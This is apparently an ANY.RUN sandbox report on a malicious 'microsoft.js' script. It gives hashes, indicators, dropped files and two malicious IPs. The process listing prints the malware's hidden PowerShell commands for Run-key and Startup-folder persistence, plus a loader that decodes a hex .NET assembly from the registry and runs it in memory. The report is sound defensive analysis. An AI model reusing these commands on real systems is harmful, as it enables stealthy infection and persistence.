analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

microsoft.js

Full analysis: https://app.any.run/tasks/1f5d00d0-8ef5-494a-8ea9-345dfeb07027
Verdict: Malicious activity
Analysis date: August 13, 2019, 17:58:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/x-c
File info: C source, ASCII text, with very long lines, with no line terminators
MD5:

B42A3D3DB0F56AA0E41539404B541AF9

SHA1:

CB029E2A052B3B3C8E58ABFFD290333EDFE33C26

SHA256:

E0DD4125CDC3530363BF5A8BE3EFFBDCA09C4AE298629BC59021F7BDCAA7B834

SSDEEP:

384:ZqRDEWe1Ae1UFty3Z5eRMC8lu9eIU2uN0aSVREEfKNCISreYucDMOXVROe55Pks:fR3PeqC8lu9eIUzDSVRnMseYvoOlR9ks

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • powershell.exe (PID: 3588)
    • Writes to a start menu file

      • powershell.exe (PID: 2216)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • WScript.exe (PID: 2632)
      • wscript.exe (PID: 2348)
    • Creates files in the user directory

      • powershell.exe (PID: 2216)
      • powershell.exe (PID: 1360)
      • powershell.exe (PID: 3588)
      • powershell.exe (PID: 3592)
    • Executes scripts

      • powershell.exe (PID: 1360)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
6
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs wscript.exe no specs powershell.exe powershell.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2632"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\microsoft.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1360"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\microsoft.js'));wscript 'C:\Users\admin\AppData\Roaming\microsoft.js'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2348"C:\Windows\system32\wscript.exe" C:\Users\admin\AppData\Roaming\microsoft.jsC:\Windows\system32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3588"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\admin\AppData\Roaming\microsoft.js' -PropertyType String -Force;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2216"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\microsoft.js'))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3592"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
965
Read events
736
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
9
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
1360powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X31H9SDK45E7ZGTB06DR.temp
MD5:
SHA256:
3588powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1WRBHLQR8OLUMDM2B7K1.temp
MD5:
SHA256:
3592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T1GSJ0JN7ZYISGVYAITY.temp
MD5:
SHA256:
2216powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SATKO4CR2AOOGTSIT5Q0.temp
MD5:
SHA256:
3592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF36ed67.TMPbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
3592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2216powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
1360powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2216powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.jstext
MD5:B42A3D3DB0F56AA0E41539404B541AF9
SHA256:E0DD4125CDC3530363BF5A8BE3EFFBDCA09C4AE298629BC59021F7BDCAA7B834
3588powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
18
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3592
powershell.exe
185.165.153.250:5478
NL
malicious
3592
powershell.exe
193.56.28.134:5478
malicious
193.56.28.134:5478
malicious

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info